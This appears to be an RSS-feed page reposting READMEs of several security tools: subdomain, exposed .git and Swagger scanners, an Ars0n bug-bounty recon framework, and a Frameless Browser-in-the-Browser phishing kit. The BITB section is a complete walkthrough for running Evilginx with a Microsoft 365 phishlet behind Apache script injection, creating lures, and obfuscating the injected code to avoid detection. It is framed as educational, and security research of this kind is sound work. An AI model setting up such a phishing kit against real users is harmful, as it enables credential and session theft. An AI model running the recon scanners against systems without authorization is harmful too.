FreshRSS

πŸ”’
❌ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayYour RSS feeds

Ars0N-Framework - A Modern Framework For Bug Bounty Hunting

By: Zion3R



Howdy! My name is Harrison Richardson, or rs0n (arson) when I want to feel cooler than I really am. The code in this repository started as a small collection of scripts to help automate many of the common Bug Bounty hunting processes I found myself repeating. Over time, I built a simple web application with a MongoDB connection to manage my findings and identify valuable data points. After 5 years of Bug Bounty hunting, both part-time and full-time, I'm finally ready to package this collection of tools into a proper framework.


The Ars0n Framework is designed to provide aspiring Application Security Engineers with all the tools they need to leverage Bug Bounty hunting as a means to learn valuable, real-world AppSec concepts and make πŸ’° doing it! My goal is to lower the barrier of entry for Bug Bounty hunting by providing easy-to-use automation tools in combination with educational content and how-to guides for a wide range of Web-based and Cloud-based vulnerabilities. In combination with my YouTube content, this framework will help aspiring Application Security Engineers to quickly and easily understand real-world security concepts that directly translate to a high paying career in Cyber Security.

In addition to using this tool for Bug Bounty Hunting, aspiring engineers can also use this Github Repository as a canvas to practice collaborating with other developers! This tool was inspired by Metasploit and designed to be modular in a similar way. Each Script (Ex: wildfire.py or slowburn.py) is basically an algorithm that runs the Modules (Ex: fire-starter.py or fire-scanner.py) in a specific patter for a desired result. Because of this design, the community is free to build new Scripts to solve a specific use-case or Modules to expand the results of these Scripts. By learning the code in this framework and using Github to contribute your own code, aspiring engineers will continue to learn real-world skills that can be applied on the first day of a Security Engineer I position.

My hope is that this modular framework will act as a canvas to help share what I've learned over my career to the next generation of Security Engineers! Trust me, we need all the help we can get!!


Quick Start

Paste this code block into a clean installation of Kali Linux 2023.4 to download, install, and run the latest stable Alpha version of the framework:

sudo apt update && sudo apt-get update
sudo apt -y upgrade && sudo apt-get -y upgrade
wget https://github.com/R-s0n/ars0n-framework/releases/download/v0.0.2-alpha/ars0n-framework-v0.0.2-alpha.tar.gz
tar -xzvf ars0n-framework-v0.0.2-alpha.tar.gz
rm ars0n-framework-v0.0.2-alpha.tar.gz
cd ars0n-framework
./install.sh

Download Latest Stable ALPHA Version

wget https://github.com/R-s0n/ars0n-framework/releases/download/v0.0.2-alpha/ars0n-framework-v0.0.2-alpha.tar.gz
tar -xzvf ars0n-framework-v0.0.2-alpha.tar.gz
rm ars0n-framework-v0.0.2-alpha.tar.gz

Install

The Ars0n Framework includes a script that installs all the necessary tools, packages, etc. that are needed to run the framework on a clean installation of Kali Linux 2023.4.

Please note that the only supported installation of this framework is on a clean installation of Kali Linux 2023.3. If you choose to try and run the framework outside of a clean Kali install, I will not be able to help troubleshoot if you have any issues.

./install.sh

This video shows exactly what to expect from a successful installation.

If you are using an ARM Processor, you will need to add the --arm flag to all Install/Run scripts

./install.sh --arm

You will be prompted to enter various API keys and tokens when the installation begins. Entering these is not required to run the core functionality of the framework. If you do not enter these API keys and tokens at the time of installation, simply hit enter at each of the prompts. The keys can be added later to the ~/.keys directory. More information about how to add these keys manually can be found in the Frequently Asked Questions section of this README.

Run the Web Application (Client and Server)

Once the installation is complete, you will be given the option to run the application by entering Y. If you choose not the run the application immediately, or if you need to run the application after a reboot, simply navigate to the root directly and run the run.sh bash script.

./run.sh

If you are using an ARM Processor, you will need to add the --arm flag to all Install/Run scripts

./run.sh --arm

Core Modules

The Ars0n Framework's Core Modules are used to determine the basic scanning logic. Each script is designed to support a specific recon methodology based on what the user is trying to accomplish.

Wildfire

At this time, the Wildfire script is the most widely used Core Module in the Ars0n Framework. The purpose of this module is to allow the user to scan multiple targets that allow for testing on any subdomain discovered by the researcher.

How it works:

  1. The user adds root domains through the Graphical User Interface (GUI) that they wish to scan for hidden subdomains
  2. Wildfire sorts each of these domains based on the last time they were scanned to ensure the domain with the oldest data is scanned first
  3. Wildfire scans each of the domains using the Sub-Modules based on the flags provided by the user.

Most Wildfire scans take between 8 and 48 hours to complete against a single domain if all Sub-Modules are being run. Variations in this timing can be caused by a number of factors, including the target application and the machine running the framework.

Also, please note that most data will not show in the GUI until the scan has completed. It's best to try and run the scan overnight or over a weekend, depending on the number of domains being scanned, and return once the scan has complete to move from Recon to Enumeration.

Running Wildfire:

Graphical User Interface (GUI)

Wildfire can be run from the GUI using the Wildfire button on the dashboard. Once clicked, the front-end will use the checkboxes on the screen to determine what flags should be passed to the scanner.

Please note that running scans from the GUI still has a few bugs and edge cases that haven't been sorted out. If you have any issues, you can simply run the scan form the CLI.

Command Line Interface (CLI)

All Core Modules for The Ars0n Framework are stored in the /toolkit directory. Simply navigate to the directory and run wildfire.py with the necessary flags. At least one Sub-Module flag must be provided.

python3 wildfire.py --start --cloud --scan

Slowburn

Unlike the Wildfire module, which requires the user to identify target domains to scan, the Slowburn module does that work for you. By communicating with APIs for various bug bounty hunting platforms, this script will identify all domains that allow for testing on any discovered subdomain. Once the data has been populated, Slowburn will randomly choose one domain at a time to scan in the same way Wildfire does.

Please note that the Slowburn module is still in development and is not considered part of the stable alpha release. There will likely be bugs and edge cases encountered by the user.

In order for Slowburn to identify targets to scan, it must first be initialized. This initialization step collects the necessary data from various API's and deposits them into a JSON file stored locally. Once this initialization step is complete, Slowburn will automatically begin selecting and scanning one target at a time.

To initalize Slowburn, simply run the following command:

python3 slowburn.py --initialize

Once the data has been collected, it is up to the user whether they want to re-initialize the tool upon the next scan.

Remember that the scope and targets on public bug bounty programs can change frequently. If you choose to run Slowburn without initializing the data, you may be scanning domains that are no longer in scope for the program. It is strongly recommended that Slowburn be re-initialized each time before running.

If you choose not to re-initialize the target data, you can run Slowburn using the previously collected data with the following command:

python3 slowburn.py

Sub-Modules

The Ars0n Framework's Sub-Modules are designed to be leveraged by the Core Modules to divide the Recon & Enumeration phases into specific tasks. The data collected in each Sub-Module is used by the others to expand your picture of the target's attack surface.

Fire-Starter

Fire-Starter is the first step to performing recon against a target domain. The goal of this script is to collect a wealth of information about the attack surface of your target. Once collected, this data will be used by all other Sub-Modules to help the user identify a specific URL that is potentially vulnerable.

Fire-Starter works by running a series of open-source tools to enumerate hidden subdomains, DNS records, and the ASN's to identify where those external entries are hosted. Currently, Fire-Starter works by chaining together the following widely used open-source tools:

  • Amass
  • Sublist3r
  • Assetfinder
  • Get All URL's (GAU)
  • Certificate Transparency Logs (CRT)
  • Subfinder
  • ShuffleDNS
  • GoSpider
  • Subdomainizer

These tools cover a wide range of techniques to identify hidden subdomains, including web scraping, brute force, and crawling to identify links and JavaScript URLs.

Once the scan is complete, the Dashboard will be updated and available to the user.

Most Sub-Modules in The Ars0n Framework requre the data collected from the Fire-Starter module to work. With this in mind, Fire-Starter must be included in the first scan against a target for any usable data to be collected.

Fire-Cloud

Coming soon...

Fire-Scanner

Fire-Scanner uses the results of Fire-Starter and Fire-Cloud to perform Wide-Band Scanning against all subdomains and cloud services that have been discovered from previous scans.

At this stage of development, this script leverages Nuclei almost exclusively for all scanning. Instead of simply running the tool, Fire-Scanner breaks the scan down into specific collections of Nuclei Templates and scans them one by one. This strategy helps ensure the scans are stable and produce consistent results, removes any unnecessary or unsafe scan checks, and produces actionable results.

Troubleshooting

The vast majority of issues installing and/or running the Ars0n Framework are caused by not installing the tool on a clean installation of Kali Linux.

It is important to remember that, at its core, the Ars0n Framework is a collection of automation scripts designed to run existing open-source tools. Each of these tools have their own ways of operating and can experience unexpected behavior if conflicts emerge with any existing service/tool running on the user's system. This complexity is the reason why running The Ars0n Framework should only be run on a clean installation of Kali Linux.

Another very common issue users experience is caused by MongoDB not successfully installing and/or running on their machine. The most common manifestation of this issue is the user is unable to add an initial FQDN and simply sees a broken GUI. If this occurs, please ensure that your machine has the necessary system requirements to run MongoDB. Unfortunately, there is no current solution if you run into this issue.

Frequently Asked Questions

Coming soon...



Frameless-Bitb - A New Approach To Browser In The Browser (BITB) Without The Use Of Iframes, Allowing The Bypass Of Traditional Framebusters Implemented By Login Pages Like Microsoft And The Use With Evilginx

By: Zion3R


A new approach to Browser In The Browser (BITB) without the use of iframes, allowing the bypass of traditional framebusters implemented by login pages like Microsoft.

This POC code is built for using this new BITB with Evilginx, and a Microsoft Enterprise phishlet.


Before diving deep into this, I recommend that you first check my talk at BSides 2023, where I first introduced this concept along with important details on how to craft the "perfect" phishing attack. β–Ά Watch Video

β˜•οΈŽ Buy Me A Coffee

Video Tutorial: πŸ‘‡

Disclaimer

This tool is for educational and research purposes only. It demonstrates a non-iframe based Browser In The Browser (BITB) method. The author is not responsible for any misuse. Use this tool only legally and ethically, in controlled environments for cybersecurity defense testing. By using this tool, you agree to do so responsibly and at your own risk.

Backstory - The Why

Over the past year, I've been experimenting with different tricks to craft the "perfect" phishing attack. The typical "red flags" people are trained to look for are things like urgency, threats, authority, poor grammar, etc. The next best thing people nowadays check is the link/URL of the website they are interacting with, and they tend to get very conscious the moment they are asked to enter sensitive credentials like emails and passwords.

That's where Browser In The Browser (BITB) came into play. Originally introduced by @mrd0x, BITB is a concept of creating the appearance of a believable browser window inside of which the attacker controls the content (by serving the malicious website inside an iframe). However, the fake URL bar of the fake browser window is set to the legitimate site the user would expect. This combined with a tool like Evilginx becomes the perfect recipe for a believable phishing attack.

The problem is that over the past months/years, major websites like Microsoft implemented various little tricks called "framebusters/framekillers" which mainly attempt to break iframes that might be used to serve the proxied website like in the case of Evilginx.

In short, Evilginx + BITB for websites like Microsoft no longer works. At least not with a BITB that relies on iframes.

The What

A Browser In The Browser (BITB) without any iframes! As simple as that.

Meaning that we can now use BITB with Evilginx on websites like Microsoft.

Evilginx here is just a strong example, but the same concept can be used for other use-cases as well.

The How

Framebusters target iframes specifically, so the idea is to create the BITB effect without the use of iframes, and without disrupting the original structure/content of the proxied page. This can be achieved by injecting scripts and HTML besides the original content using search and replace (aka substitutions), then relying completely on HTML/CSS/JS tricks to make the visual effect. We also use an additional trick called "Shadow DOM" in HTML to place the content of the landing page (background) in such a way that it does not interfere with the proxied content, allowing us to flexibly use any landing page with minor additional JS scripts.

Instructions

Video Tutorial


Local VM:

Create a local Linux VM. (I personally use Ubuntu 22 on VMWare Player or Parallels Desktop)

Update and Upgrade system packages:

sudo apt update && sudo apt upgrade -y

Evilginx Setup:

Optional:

Create a new evilginx user, and add user to sudo group:

sudo su

adduser evilginx

usermod -aG sudo evilginx

Test that evilginx user is in sudo group:

su - evilginx

sudo ls -la /root

Navigate to users home dir:

cd /home/evilginx

(You can do everything as sudo user as well since we're running everything locally)

Setting Up Evilginx

Download and build Evilginx: Official Docs

Copy Evilginx files to /home/evilginx

Install Go: Official Docs

wget https://go.dev/dl/go1.21.4.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.21.4.linux-amd64.tar.gz
nano ~/.profile

ADD: export PATH=$PATH:/usr/local/go/bin

source ~/.profile

Check:

go version

Install make:

sudo apt install make

Build Evilginx:

cd /home/evilginx/evilginx2
make

Create a new directory for our evilginx build along with phishlets and redirectors:

mkdir /home/evilginx/evilginx

Copy build, phishlets, and redirectors:

cp /home/evilginx/evilginx2/build/evilginx /home/evilginx/evilginx/evilginx

cp -r /home/evilginx/evilginx2/redirectors /home/evilginx/evilginx/redirectors

cp -r /home/evilginx/evilginx2/phishlets /home/evilginx/evilginx/phishlets

Ubuntu firewall quick fix (thanks to @kgretzky)

sudo setcap CAP_NET_BIND_SERVICE=+eip /home/evilginx/evilginx/evilginx

On Ubuntu, if you get Failed to start nameserver on: :53 error, try modifying this file

sudo nano /etc/systemd/resolved.conf

edit/add the DNSStubListener to no > DNSStubListener=no

then

sudo systemctl restart systemd-resolved

Modify Evilginx Configurations:

Since we will be using Apache2 in front of Evilginx, we need to make Evilginx listen to a different port than 443.

nano ~/.evilginx/config.json

CHANGE https_port from 443 to 8443

Install Apache2 and Enable Mods:

Install Apache2:

sudo apt install apache2 -y

Enable Apache2 mods that will be used: (We are also disabling access_compat module as it sometimes causes issues)

sudo a2enmod proxy
sudo a2enmod proxy_http
sudo a2enmod proxy_balancer
sudo a2enmod lbmethod_byrequests
sudo a2enmod env
sudo a2enmod include
sudo a2enmod setenvif
sudo a2enmod ssl
sudo a2ensite default-ssl
sudo a2enmod cache
sudo a2enmod substitute
sudo a2enmod headers
sudo a2enmod rewrite
sudo a2dismod access_compat

Start and enable Apache:

sudo systemctl start apache2
sudo systemctl enable apache2

Try if Apache and VM networking works by visiting the VM's IP from a browser on the host machine.

Clone this Repo:

Install git if not already available:

sudo apt -y install git

Clone this repo:

git clone https://github.com/waelmas/frameless-bitb
cd frameless-bitb

Apache Custom Pages:

Make directories for the pages we will be serving:

  • home: (Optional) Homepage (at base domain)
  • primary: Landing page (background)
  • secondary: BITB Window (foreground)
sudo mkdir /var/www/home
sudo mkdir /var/www/primary
sudo mkdir /var/www/secondary

Copy the directories for each page:


sudo cp -r ./pages/home/ /var/www/

sudo cp -r ./pages/primary/ /var/www/

sudo cp -r ./pages/secondary/ /var/www/

Optional: Remove the default Apache page (not used):

sudo rm -r /var/www/html/

Copy the O365 phishlet to phishlets directory:

sudo cp ./O365.yaml /home/evilginx/evilginx/phishlets/O365.yaml

Optional: To set the Calendly widget to use your account instead of the default I have inside, go to pages/primary/script.js and change the CALENDLY_PAGE_NAME and CALENDLY_EVENT_TYPE.

Note on Demo Obfuscation: As I explain in the walkthrough video, I included a minimal obfuscation for text content like URLs and titles of the BITB. You can open the demo obfuscator by opening demo-obfuscator.html in your browser. In a real-world scenario, I would highly recommend that you obfuscate larger chunks of the HTML code injected or use JS tricks to avoid being detected and flagged. The advanced version I am working on will use a combination of advanced tricks to make it nearly impossible for scanners to fingerprint/detect the BITB code, so stay tuned.

Self-signed SSL certificates:

Since we are running everything locally, we need to generate self-signed SSL certificates that will be used by Apache. Evilginx will not need the certs as we will be running it in developer mode.

We will use the domain fake.com which will point to our local VM. If you want to use a different domain, make sure to change the domain in all files (Apache conf files, JS files, etc.)

Create dir and parents if they do not exist:

sudo mkdir -p /etc/ssl/localcerts/fake.com/

Generate the SSL certs using the OpenSSL config file:

sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
-keyout /etc/ssl/localcerts/fake.com/privkey.pem -out /etc/ssl/localcerts/fake.com/fullchain.pem \
-config openssl-local.cnf

Modify private key permissions:

sudo chmod 600 /etc/ssl/localcerts/fake.com/privkey.pem

Apache Custom Configs:

Copy custom substitution files (the core of our approach):

sudo cp -r ./custom-subs /etc/apache2/custom-subs

Important Note: In this repo I have included 2 substitution configs for Chrome on Mac and Chrome on Windows BITB. Both have auto-detection and styling for light/dark mode and they should act as base templates to achieve the same for other browser/OS combos. Since I did not include automatic detection of the browser/OS combo used to visit our phishing page, you will have to use one of two or implement your own logic for automatic switching.

Both config files under /apache-configs/ are the same, only with a different Include directive used for the substitution file that will be included. (there are 2 references for each file)

# Uncomment the one you want and remember to restart Apache after any changes:
#Include /etc/apache2/custom-subs/win-chrome.conf
Include /etc/apache2/custom-subs/mac-chrome.conf

Simply to make it easier, I included both versions as separate files for this next step.

Windows/Chrome BITB:

sudo cp ./apache-configs/win-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf

Mac/Chrome BITB:

sudo cp ./apache-configs/mac-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf

Test Apache configs to ensure there are no errors:

sudo apache2ctl configtest

Restart Apache to apply changes:

sudo systemctl restart apache2

Modifying Hosts:

Get the IP of the VM using ifconfig and note it somewhere for the next step.

We now need to add new entries to our hosts file, to point the domain used in this demo fake.com and all used subdomains to our VM on which Apache and Evilginx are running.

On Windows:

Open Notepad as Administrator (Search > Notepad > Right-Click > Run as Administrator)

Click on the File option (top-left) and in the File Explorer address bar, copy and paste the following:

C:\Windows\System32\drivers\etc\

Change the file types (bottom-right) to "All files".

Double-click the file named hosts

On Mac:

Open a terminal and run the following:

sudo nano /private/etc/hosts

Now modify the following records (replace [IP] with the IP of your VM) then paste the records at the end of the hosts file:

# Local Apache and Evilginx Setup
[IP] login.fake.com
[IP] account.fake.com
[IP] sso.fake.com
[IP] www.fake.com
[IP] portal.fake.com
[IP] fake.com
# End of section

Save and exit.

Now restart your browser before moving to the next step.

Note: On Mac, use the following command to flush the DNS cache:

sudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder

Important Note:

This demo is made with the provided Office 365 Enterprise phishlet. To get the host entries you need to add for a different phishlet, use phishlet get-hosts [PHISHLET_NAME] but remember to replace the 127.0.0.1 with the actual local IP of your VM.

Trusting the Self-Signed SSL Certs:

Since we are using self-signed SSL certificates, our browser will warn us every time we try to visit fake.com so we need to make our host machine trust the certificate authority that signed the SSL certs.

For this step, it's easier to follow the video instructions, but here is the gist anyway.

Open https://fake.com/ in your Chrome browser.

Ignore the Unsafe Site warning and proceed to the page.

Click the SSL icon > Details > Export Certificate IMPORTANT: When saving, the name MUST end with .crt for Windows to open it correctly.

Double-click it > install for current user. Do NOT select automatic, instead place the certificate in specific store: select "Trusted Route Certification Authorities".

On Mac: to install for current user only > select "Keychain: login" AND click on "View Certificates" > details > trust > Always trust

Now RESTART your Browser

You should be able to visit https://fake.com now and see the homepage without any SSL warnings.

Running Evilginx:

At this point, everything should be ready so we can go ahead and start Evilginx, set up the phishlet, create our lure, and test it.

Optional: Install tmux (to keep evilginx running even if the terminal session is closed. Mainly useful when running on remote VM.)

sudo apt install tmux -y

Start Evilginx in developer mode (using tmux to avoid losing the session):

tmux new-session -s evilginx
cd ~/evilginx/
./evilginx -developer

(To re-attach to the tmux session use tmux attach-session -t evilginx)

Evilginx Config:

config domain fake.com
config ipv4 127.0.0.1

IMPORTANT: Set Evilginx Blacklist mode to NoAdd to avoid blacklisting Apache since all requests will be coming from Apache and not the actual visitor IP.

blacklist noadd

Setup Phishlet and Lure:

phishlets hostname O365 fake.com
phishlets enable O365
lures create O365
lures get-url 0

Copy the lure URL and visit it from your browser (use Guest user on Chrome to avoid having to delete all saved/cached data between tests).

Useful Resources

Original iframe-based BITB by @mrd0x: https://github.com/mrd0x/BITB

Evilginx Mastery Course by the creator of Evilginx @kgretzky: https://academy.breakdev.org/evilginx-mastery

My talk at BSides 2023: https://www.youtube.com/watch?v=p1opa2wnRvg

How to protect Evilginx using Cloudflare and HTML Obfuscation: https://www.jackphilipbutton.com/post/how-to-protect-evilginx-using-cloudflare-and-html-obfuscation

Evilginx resources for Microsoft 365 by @BakkerJan: https://janbakker.tech/evilginx-resources-for-microsoft-365/

TODO

  • Create script(s) to automate most of the steps


RepoReaper - An Automated Tool Crafted To Meticulously Scan And Identify Exposed .Git Repositories Within Specified Domains And Their Subdomains

By: Zion3R


RepoReaper is a precision tool designed to automate the identification of exposed .git repositories across a list of domains and subdomains. By processing a user-provided text file with domain names, RepoReaper systematically checks each for publicly accessible .git files. This enables rapid assessment and protection against information leaks, making RepoReaper an essential resource for security teams and web developers.


Features
  • Automated scanning of domains and subdomains for exposed .git repositories.
  • Streamlines the detection of sensitive data exposures.
  • User-friendly command-line interface.
  • Ideal for security audits and Bug Bounty.

Installation

Clone the repository and install the required dependencies:

git clone https://github.com/YourUsername/RepoReaper.git
cd RepoReaper
pip install -r requirements.txt
chmod +x RepoReaper.py

Usage

RepoReaper is executed from the command line and will prompt for the path to a file containing a list of domains or subdomains to be scanned.

To start RepoReaper, simply run:

./RepoReaper.py
or
python3 RepoReaper.py

Upon execution, RepoReaper will ask for the path to the file containing the domains or subdomains: Enter the path of the file containing domains

Provide the path to your text file when prompted. The file should contain one domain or subdomain per line, like so:

example.com
subdomain.example.com
anotherdomain.com

RepoReaper will then proceed to scan the provided domains or subdomains for exposed .git repositories and report its findings.Β 


Disclaimer

This tool is intended for educational purposes and security research only. The user assumes all responsibility for any damages or misuse resulting from its use.



AzSubEnum - Azure Service Subdomain Enumeration

By: Zion3R


AzSubEnum is a specialized subdomain enumeration tool tailored for Azure services. This tool is designed to meticulously search and identify subdomains associated with various Azure services. Through a combination of techniques and queries, AzSubEnum delves into the Azure domain structure, systematically probing and collecting subdomains related to a diverse range of Azure services.


How it works?

AzSubEnum operates by leveraging DNS resolution techniques and systematic permutation methods to unveil subdomains associated with Azure services such as Azure App Services, Storage Accounts, Azure Databases (including MSSQL, Cosmos DB, and Redis), Key Vaults, CDN, Email, SharePoint, Azure Container Registry, and more. Its functionality extends to comprehensively scanning different Azure service domains to identify associated subdomains.

With this tool, users can conduct thorough subdomain enumeration within Azure environments, aiding security professionals, researchers, and administrators in gaining insights into the expansive landscape of Azure services and their corresponding subdomains.


Why i create this?

During my learning journey on Azure AD exploitation, I discovered that the Azure subdomain tool, Invoke-EnumerateAzureSubDomains from NetSPI, was unable to run on my Debian PowerShell. Consequently, I created a crude implementation of that tool in Python.


Usage
➜  AzSubEnum git:(main) βœ— python3 azsubenum.py --help
usage: azsubenum.py [-h] -b BASE [-v] [-t THREADS] [-p PERMUTATIONS]

Azure Subdomain Enumeration

options:
-h, --help show this help message and exit
-b BASE, --base BASE Base name to use
-v, --verbose Show verbose output
-t THREADS, --threads THREADS
Number of threads for concurrent execution
-p PERMUTATIONS, --permutations PERMUTATIONS
File containing permutations

Basic enumeration:

python3 azsubenum.py -b retailcorp --thread 10

Using permutation wordlists:

python3 azsubenum.py -b retailcorp --thread 10 --permutation permutations.txt

With verbose output:

python3 azsubenum.py -b retailcorp --thread 10 --permutation permutations.txt --verbose




APIDetector - Efficiently Scan For Exposed Swagger Endpoints Across Web Domains And Subdomains

By: Zion3R


APIDetector is a powerful and efficient tool designed for testing exposed Swagger endpoints in various subdomains with unique smart capabilities to detect false-positives. It's particularly useful for security professionals and developers who are engaged in API testing and vulnerability scanning.


Features

  • Flexible Input: Accepts a single domain or a list of subdomains from a file.
  • Multiple Protocols: Option to test endpoints over both HTTP and HTTPS.
  • Concurrency: Utilizes multi-threading for faster scanning.
  • Customizable Output: Save results to a file or print to stdout.
  • Verbose and Quiet Modes: Default verbose mode for detailed logs, with an option for quiet mode.
  • Custom User-Agent: Ability to specify a custom User-Agent for requests.
  • Smart Detection of False-Positives: Ability to detect most false-positives.

Getting Started

Prerequisites

Before running APIDetector, ensure you have Python 3.x and pip installed on your system. You can download Python here.

Installation

Clone the APIDetector repository to your local machine using:

git clone https://github.com/brinhosa/apidetector.git
cd apidetector
pip install requests

Usage

Run APIDetector using the command line. Here are some usage examples:

  • Common usage, scan with 30 threads a list of subdomains using a Chrome user-agent and save the results in a file:

    python apidetector.py -i list_of_company_subdomains.txt -o results_file.txt -t 30 -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
  • To scan a single domain:

    python apidetector.py -d example.com
  • To scan multiple domains from a file:

    python apidetector.py -i input_file.txt
  • To specify an output file:

    python apidetector.py -i input_file.txt -o output_file.txt
  • To use a specific number of threads:

    python apidetector.py -i input_file.txt -t 20
  • To scan with both HTTP and HTTPS protocols:

    python apidetector.py -m -d example.com
  • To run the script in quiet mode (suppress verbose output):

    python apidetector.py -q -d example.com
  • To run the script with a custom user-agent:

    python apidetector.py -d example.com -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"

Options

  • -d, --domain: Single domain to test.
  • -i, --input: Input file containing subdomains to test.
  • -o, --output: Output file to write valid URLs to.
  • -t, --threads: Number of threads to use for scanning (default is 10).
  • -m, --mixed-mode: Test both HTTP and HTTPS protocols.
  • -q, --quiet: Disable verbose output (default mode is verbose).
  • -ua, --user-agent: Custom User-Agent string for requests.

RISK DETAILS OF EACH ENDPOINT APIDETECTOR FINDS

Exposing Swagger or OpenAPI documentation endpoints can present various risks, primarily related to information disclosure. Here's an ordered list based on potential risk levels, with similar endpoints grouped together APIDetector scans:

1. High-Risk Endpoints (Direct API Documentation):

  • Endpoints:
    • '/swagger-ui.html', '/swagger-ui/', '/swagger-ui/index.html', '/api/swagger-ui.html', '/documentation/swagger-ui.html', '/swagger/index.html', '/api/docs', '/docs', '/api/swagger-ui', '/documentation/swagger-ui'
  • Risk:
    • These endpoints typically serve the Swagger UI interface, which provides a complete overview of all API endpoints, including request formats, query parameters, and sometimes even example requests and responses.
    • Risk Level: High. Exposing these gives potential attackers detailed insights into your API structure and potential attack vectors.

2. Medium-High Risk Endpoints (API Schema/Specification):

  • Endpoints:
    • '/openapi.json', '/swagger.json', '/api/swagger.json', '/swagger.yaml', '/swagger.yml', '/api/swagger.yaml', '/api/swagger.yml', '/api.json', '/api.yaml', '/api.yml', '/documentation/swagger.json', '/documentation/swagger.yaml', '/documentation/swagger.yml'
  • Risk:
    • These endpoints provide raw Swagger/OpenAPI specification files. They contain detailed information about the API endpoints, including paths, parameters, and sometimes authentication methods.
    • Risk Level: Medium-High. While they require more interpretation than the UI interfaces, they still reveal extensive information about the API.

3. Medium Risk Endpoints (API Documentation Versions):

  • Endpoints:
    • '/v2/api-docs', '/v3/api-docs', '/api/v2/swagger.json', '/api/v3/swagger.json', '/api/v1/documentation', '/api/v2/documentation', '/api/v3/documentation', '/api/v1/api-docs', '/api/v2/api-docs', '/api/v3/api-docs', '/swagger/v2/api-docs', '/swagger/v3/api-docs', '/swagger-ui.html/v2/api-docs', '/swagger-ui.html/v3/api-docs', '/api/swagger/v2/api-docs', '/api/swagger/v3/api-docs'
  • Risk:
    • These endpoints often refer to version-specific documentation or API descriptions. They reveal information about the API's structure and capabilities, which could aid an attacker in understanding the API's functionality and potential weaknesses.
    • Risk Level: Medium. These might not be as detailed as the complete documentation or schema files, but they still provide useful information for attackers.

4. Lower Risk Endpoints (Configuration and Resources):

  • Endpoints:
    • '/swagger-resources', '/swagger-resources/configuration/ui', '/swagger-resources/configuration/security', '/api/swagger-resources', '/api.html'
  • Risk:
    • These endpoints often provide auxiliary information, configuration details, or resources related to the API documentation setup.
    • Risk Level: Lower. They may not directly reveal API endpoint details but can give insights into the configuration and setup of the API documentation.

Summary:

  • Highest Risk: Directly exposing interactive API documentation interfaces.
  • Medium-High Risk: Exposing raw API schema/specification files.
  • Medium Risk: Version-specific API documentation.
  • Lower Risk: Configuration and resource files for API documentation.

Recommendations:

  • Access Control: Ensure that these endpoints are not publicly accessible or are at least protected by authentication mechanisms.
  • Environment-Specific Exposure: Consider exposing detailed API documentation only in development or staging environments, not in production.
  • Monitoring and Logging: Monitor access to these endpoints and set up alerts for unusual access patterns.

Contributing

Contributions to APIDetector are welcome! Feel free to fork the repository, make changes, and submit pull requests.

Legal Disclaimer

The use of APIDetector should be limited to testing and educational purposes only. The developers of APIDetector assume no liability and are not responsible for any misuse or damage caused by this tool. It is the end user's responsibility to obey all applicable local, state, and federal laws. Developers assume no responsibility for unauthorized or illegal use of this tool. Before using APIDetector, ensure you have permission to test the network or systems you intend to scan.

License

This project is licensed under the MIT License.

Acknowledgments



PathFinder - Tool That Provides Information About A Website

By: Zion3R


Web Path Finder is a Python program that provides information about a website. It retrieves various details such as page title, last updated date, DNS information, subdomains, firewall names, technologies used, certificate information, and more.Β 


  • Retrieve important information about a website
  • Gain insights into the technologies used by a website
  • Identify subdomains and DNS information
  • Check firewall names and certificate details
  • Perform bypass operations for captcha and JavaScript content

  1. Clone the repository:

    git clone https://github.com/HalilDeniz/PathFinder.git
  2. Install the required packages:

    pip install -r requirements.txt

This will install all the required modules and their respective versions.

Run the program using the following command:

Ò”ŒÒ”€Ò”€(root💀denizhalil)-[~/MyProjects/]
Ò””Ò”€# python3 web-info-explorer.py --help
usage: wpathFinder.py [-h] url

Web Information Program

positional arguments:
url Enter the site URL

options:
-h, --help show this help message and exit

Replace <url> with the URL of the website you want to explore.

Here is an example output of running the program:

Ò”ŒÒ”€Ò”€(root💀denizhalil)-[~/MyProjects/]
Ò””Ò”€# python3 pathFinder.py https://www.facebook.com/
Site Information:
Title: Facebook - Login or Register
Last Updated Date: None
First Creation Date: 1997-03-29 05:00:00
Dns Information: []
Sub Branches: ['157']
Firewall Names: []
Technologies Used: javascript, php, css, html, react
Certificate Information:
Certificate Issuer: US
Certificate Start Date: 2023-02-07 00:00:00
Certificate Expiration Date: 2023-05-08 23:59:59
Certificate Validity Period (Days): 90
Bypassed JavaScript content:
</ div>

Contributions are welcome! To contribute to PathFinder, follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

  • Thank you my friend Varol

This project is licensed under the MIT License - see the LICENSE file for details.

For any inquiries or further information, you can reach me through the following channels:



Nodesub - Command-Line Tool For Finding Subdomains In Bug Bounty Programs

By: Zion3R


Nodesub is a command-line tool for finding subdomains in bug bounty programs. It supports various subdomain enumeration techniques and provides flexible options for customization.


Features

  • Perform subdomain enumeration using CIDR notation (Support input list).
  • Perform subdomain enumeration using ASN (Support input list).
  • Perform subdomain enumeration using a list of domains.

Installation

To install Nodesub, use the following command:

npm install -g nodesub

NOTE:

  • Edit File ~/.config/nodesub/config.ini

Usage

nodesub -h

This will display help for the tool. Here are all the switches it supports.

Examples
  • Enumerate subdomains for a single domain:

     nodesub -u example.com
  • Enumerate subdomains for a list of domains from a file:

     nodesub -l domains.txt
  • Perform subdomain enumeration using CIDR:

    node nodesub.js -c 192.168.0.0/24 -o subdomains.txt

    node nodesub.js -c CIDR.txt -o subdomains.txt

  • Perform subdomain enumeration using ASN:

    node nodesub.js -a AS12345 -o subdomains.txt
    node nodesub.js -a ASN.txt -o subdomains.txt
  • Enable recursive subdomain enumeration and output the results to a JSON file:

     nodesub -u example.com -r -o output.json -f json

Output

The tool provides various output formats for the results, including:

  • Text (txt)
  • JSON (json)
  • CSV (csv)
  • PDF (pdf)

The output file contains the resolved subdomains, failed resolved subdomains, or all subdomains based on the options chosen.



Surf - Escalate Your SSRF Vulnerabilities On Modern Cloud Environments

By: Zion3R


